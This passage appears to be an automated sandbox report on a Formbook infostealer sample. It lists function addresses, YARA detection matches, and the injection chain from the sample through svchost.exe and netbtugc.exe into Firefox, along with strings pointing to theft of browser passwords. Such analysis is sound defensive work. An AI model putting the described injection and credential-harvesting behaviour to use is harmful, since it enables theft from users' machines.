            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035FFF094_2_035FFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03541F924_2_03541F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035FFFB14_2_035FFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03549EB04_2_03549EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035F1D5A4_2_035F1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03543D404_2_03543D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035F7D734_2_035F7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0355FDC04_2_0355FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B9C324_2_035B9C32
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035FFCF24_2_035FFCF2
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exeCode function: 10_2_033F0BAB10_2_033F0BAB
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exeCode function: 10_2_033F2B7E10_2_033F2B7E
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exeCode function: 10_2_033F0BFE10_2_033F0BFE
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exeCode function: 10_2_033F925710_2_033F9257
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exeCode function: 10_2_033F929E10_2_033F929E
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exeCode function: 10_2_033F929910_2_033F9299
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exeCode function: 10_2_033F295E10_2_033F295E
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exeCode function: 10_2_033F295710_2_033F2957
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exeCode function: 10_2_033FB0AE10_2_033FB0AE
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exeCode function: 10_2_034115EE10_2_034115EE
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_032DA35212_2_032DA352
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_032E03E612_2_032E03E6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_0322E3F012_2_0322E3F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_032C027412_2_032C0274
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_032A02C012_2_032A02C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_0321010012_2_03210100
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_032BA11812_2_032BA118
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_032A815812_2_032A8158
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_032E01AA12_2_032E01AA
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_032D41A212_2_032D41A2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_032D81CC12_2_032D81CC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_032B200012_2_032B2000
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_0322077012_2_03220770
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_0324475012_2_03244750
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_0321C7C012_2_0321C7C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_0323C6E012_2_0323C6E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_0322053512_2_03220535
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_032E059112_2_032E0591
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_032C442012_2_032C4420
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_032D244612_2_032D2446
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_032CE4F612_2_032CE4F6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_032DAB4012_2_032DAB40
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_032D6BD712_2_032D6BD7
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_0321EA8012_2_0321EA80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_0323696212_2_03236962
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_032229A012_2_032229A0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_032EA9A612_2_032EA9A6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_0322284012_2_03222840
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_0322A84012_2_0322A840
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_032068B812_2_032068B8
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_0324E8F012_2_0324E8F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_03262F2812_2_03262F28
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_03240F3012_2_03240F30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_032C2F3012_2_032C2F30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_03294F4012_2_03294F40
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_0329EFA012_2_0329EFA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_0322CFE012_2_0322CFE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_03212FC812_2_03212FC8
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_032DEE2612_2_032DEE26
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_03220E5912_2_03220E59
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_03232E9012_2_03232E90
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_032DCE9312_2_032DCE93
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_032DEEDB12_2_032DEEDB
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_0322AD0012_2_0322AD00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_032BCD1F12_2_032BCD1F
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_03238DBF12_2_03238DBF
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_0321ADE012_2_0321ADE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_03220C0012_2_03220C00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_032C0CB512_2_032C0CB5
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_03210CF212_2_03210CF2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_032D132D12_2_032D132D
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_0320D34C12_2_0320D34C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_0326739A12_2_0326739A
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_032252A012_2_032252A0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_032C12ED12_2_032C12ED
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_0323B2C012_2_0323B2C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_032EB16B12_2_032EB16B
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_0325516C12_2_0325516C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_0320F17212_2_0320F172
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_0322B1B012_2_0322B1B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_032D70E912_2_032D70E9
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_032DF0E012_2_032DF0E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_032CF0CC12_2_032CF0CC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_032270C012_2_032270C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_032DF7B012_2_032DF7B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_0326563012_2_03265630
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_032D16CC12_2_032D16CC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_032D757112_2_032D7571
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_032BD5B012_2_032BD5B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_032DF43F12_2_032DF43F
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_0321146012_2_03211460
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_032DFB7612_2_032DFB76
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_0323FB8012_2_0323FB80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_03295BF012_2_03295BF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_0325DBF912_2_0325DBF9
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_03293A6C12_2_03293A6C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_032DFA4912_2_032DFA49
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_032D7A4612_2_032D7A46
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_03265AA012_2_03265AA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_032BDAAC12_2_032BDAAC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_032C1AA312_2_032C1AA3
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_032CDAC612_2_032CDAC6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_032B591012_2_032B5910
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_0322995012_2_03229950
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_0323B95012_2_0323B950
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_0328D80012_2_0328D800
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_032238E012_2_032238E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_032DFF0912_2_032DFF09
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_032DFFB112_2_032DFFB1
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_03221F9212_2_03221F92
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_031E3FD512_2_031E3FD5
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_031E3FD212_2_031E3FD2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_03229EB012_2_03229EB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_032D7D7312_2_032D7D73
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_03223D4012_2_03223D40
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_032D1D5A12_2_032D1D5A
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_0323FDC012_2_0323FDC0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_03299C3212_2_03299C32
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_032DFCF212_2_032DFCF2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_00A11A3012_2_00A11A30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_00A0C96012_2_00A0C960
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_00A0C95912_2_00A0C959
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_00A0CB8012_2_00A0CB80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_00A0AC0012_2_00A0AC00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_00A150B012_2_00A150B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_00A132A012_2_00A132A0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_00A1329B12_2_00A1329B
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_00A1325912_2_00A13259
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_00A2B5F012_2_00A2B5F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_030DE33812_2_030DE338
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_030DE7EC12_2_030DE7EC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_030DE45312_2_030DE453
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_030DCB0312_2_030DCB03
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_030DCAAB12_2_030DCAAB
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 12_2_030DD85812_2_030DD858
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 035AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03587E54 appears 101 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0352B970 appears 272 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03575130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 035BF290 appears 105 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 03255130 appears 58 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 0328EA12 appears 86 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 03267E54 appears 102 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 0320B970 appears 277 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 0329F290 appears 105 times
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: String function: 004115D7 appears 36 times
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: String function: 00416C70 appears 39 times
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: String function: 00445AE0 appears 65 times
            Source: CYTAT.exe, 00000000.00000003.1268995808.00000000046C3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs CYTAT.exe
            Source: CYTAT.exe, 00000000.00000003.1271191039.000000000486D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs CYTAT.exe
            Source: CYTAT.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 4.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 4.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000C.00000002.3106282282.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000A.00000002.3106163686.0000000003240000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.1475778706.0000000003420000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000C.00000002.3099190951.0000000000C80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.1476818616.0000000004600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.1472630321.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000C.00000002.3094745137.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@12/9
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_0044AF6C GetLastError,FormatMessageW,0_2_0044AF6C
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,0_2_00464EAE
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,0_2_0045D619
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_004755C4 CreateToolhelp32Snapshot,Process32FirstW,__wsplitpath,_wcscat,__wcsicoll,Process32NextW,CloseHandle,0_2_004755C4
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_0047839D CoInitialize,CoCreateInstance,CoUninitialize,0_2_0047839D
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_0043305F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,0_2_0043305F
            Source: C:\Users\user\Desktop\CYTAT.exeFile created: C:\Users\user~1\AppData\Local\Temp\RamadaJump to behavior
            Source: CYTAT.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\CYTAT.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\CYTAT.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: netbtugc.exe, 0000000C.00000002.3101363339.0000000000D74000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000C.00000003.1806654781.0000000000D7E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000C.00000002.3101363339.0000000000D50000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000C.00000003.1804430151.0000000000D74000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000C.00000002.3101363339.0000000000DA3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: CYTAT.exeReversingLabs: Detection: 26%
            Source: C:\Users\user\Desktop\CYTAT.exeFile read: C:\Users\user\Desktop\CYTAT.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\CYTAT.exe "C:\Users\user\Desktop\CYTAT.exe"
            Source: C:\Users\user\Desktop\CYTAT.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\CYTAT.exe"
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\CYTAT.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\CYTAT.exe"Jump to behavior
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\CYTAT.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\CYTAT.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\CYTAT.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\CYTAT.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\CYTAT.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\CYTAT.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\CYTAT.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\CYTAT.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\CYTAT.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\CYTAT.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\CYTAT.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exeSection loaded: iphlpapi.dllJump to behavior
